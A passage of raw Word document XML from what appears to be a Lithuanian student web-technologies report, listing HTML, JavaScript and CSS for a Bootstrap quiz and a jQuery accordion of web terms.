          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;div id="quiz"&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;button id="submit"&gt;Submit Quiz&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;div id="results"&gt;&lt;/div&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 xml:space="preserve">    &lt;script src="script.js"&gt;&lt;/script&gt;</w:t>
      </w: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E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0051565C" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:left="720" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00B96D6A">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Script.js faila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function()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function buildQuiz()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we'll need a place to store the HTML outpu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output =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for each questio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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    myQuestions.forEach((currentQuestion, questionNumber) =&gt;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we'll want to store the list of answer choice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answers =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and for each available answer...</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for (letter in currentQuestion.answers)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add an HTML radio butto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s.push(</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t;label&g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t;input type="radio" name="question${questionNumber}" value="${letter}"&g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etter}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urrentQuestion.answers[letter]}</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t;/label&g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add this question and its answers to the outpu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output.push(</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t;div class="question"&gt; ${currentQuestion.question} &lt;/div&g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t;div class="answers"&gt; ${answers.join("")} &lt;/div&g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finally combine our output list into one string of HTML and put it on the page</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quizContainer.innerHTML = output.joi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function showResults()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gather answer containers from our quiz</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answerContainers = quizContainer.querySelectorAll(".answers");</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keep track of user's answer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let numCorrect = 0;</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for each questio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myQuestions.forEach((currentQuestion, questionNumber) =&gt;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find selected answer</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answerContainer = answerContainers[questionNumber];</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selector = `input[name=question${questionNumber}]:checked`;</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userAnswer = (answerContainer.querySelector(selector) || {}).value;</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if answer is correc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if (userAnswer === currentQuestion.correctAnswer)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add to the number of correct answer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numCorrect++;</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color the answers gree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Containers[questionNumber].style.color = "lightgree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els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if answer is wrong or blank</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color the answers red</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Containers[questionNumber].style.color = "red";</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show number of correct answers out of total</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resultsContainer.innerHTML = `${numCorrect} out of ${myQuestions.length}`;</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quizContainer = document.getElementById("quiz");</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resultsContainer = document.getElementById("result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submitButton = document.getElementById("submi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nst myQuestions =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question: "The Bootstrap grid system is based on how many column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s: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 "6",</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b: "8",</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        c: "12"</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rrectAnswer: "c"</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question: "Which class is used to create a big box for calling extra attentio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s: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 ".bigbox",</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b: ".jumbo",</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 ".jumbotron"</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rrectAnswer: "c"</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question: "Bootstrap is mobile-first",</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nswers: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a: "true",</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b: "false",</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correctAnswer: "a"</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display quiz right away</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buildQuiz();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pP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 on submit, show result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 xml:space="preserve">  submitButton.addEventListener("click", showResults);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>})();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AD1586" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:left="720" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="00723028">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00887C3E">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Style.css failas</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body{</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font-size: 2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font-family: sans-serif;</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color: #333;</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question{</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font-weight: 600;</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nswers {</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 xml:space="preserve">  margin-bottom: 2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nswers label{</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 xml:space="preserve">  display: block;</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submi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font-family: sans-serif;</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font-size: 2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background-color: #279;</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color: #fff;</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border: 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border-radius: 3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padding: 2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cursor: pointer;</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margin-bottom: 20px;</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submit:hover{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:tab/>
        <w:t>background-color: #38a;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>}</w:t>
      </w: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bCs w:val="0"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2 u</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>žduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A61354">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SUKURKITE</w:t>
      </w:r>
      <w:r w:rsidRPr="00A61354">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> DINAMIŠKĄ SĄVOKŲ SĄRAŠĄ</w:t>
      </w:r>
      <w:r w:rsidR="00A61354">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Rezultatai:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A61354" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="720" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:t>Index.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:lastRenderedPageBreak/>
        <w:t>&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>&lt;html lang="en"&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E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>&lt;meta charset="UTF-8"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>&lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>&lt;meta http-equiv="X-UA-Compatible" content="ie=edge"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>&lt;link rel="stylesheet" href="style.css"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>&lt;title&gt;WEB technologies&lt;/title&gt;</w:t>
      </w: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E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>&lt;h1&gt;WEB technologies&lt;/h1&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ab/>
        <w:t>&lt;div class="accordion"&gt;</w:t>
      </w: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header"&gt;HTML&lt;/div&gt;</w:t>
      </w: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content"&gt;HTML is the standard markup language for creating Web pages.&lt;/div&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header"&gt;CSS&lt;/div&gt;</w:t>
      </w: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content"&gt;CSS stands for Cascading Style Sheets.CSS describes how HTML elements are to be displayed on screen, paper, or in other media.&lt;/div&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header"&gt;JavaScript&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>&lt;div class="accordion-content"&gt;JavaScript is a scripting or programming language that allows you to implement complex things on web pages&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>&lt;script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.1.0/jquery.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>&lt;script src="script.js"&gt;&lt;/script&gt;</w:t>
      </w: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lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A456CA" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:left="720" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="008573CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:t>Script.js</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>$(".accordion").on("click", ".accordion-header", function() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    $(this).toggleClass("active").next().slideToggle();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="008C2607" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:left="720" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="00A95C1E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:t>Style.css</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>html {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>min-height: 100%;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>font-family: 'Nunito', sans-serif;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>-webkit-font-smoothing: antialiased;</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ody {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>background: linear-gradient(to bottom right, #56ab2f, #a8e063);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>line-height: 1.5;</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h1 {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>font-weight: 200;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>font-size: 3rem;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>color: white;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>text-align: center;</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accordion {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>background: linear-gradient(to bottom right, white, #F8F8F8);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>max-width: 400px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>background: white;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>margin: 0 auto;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
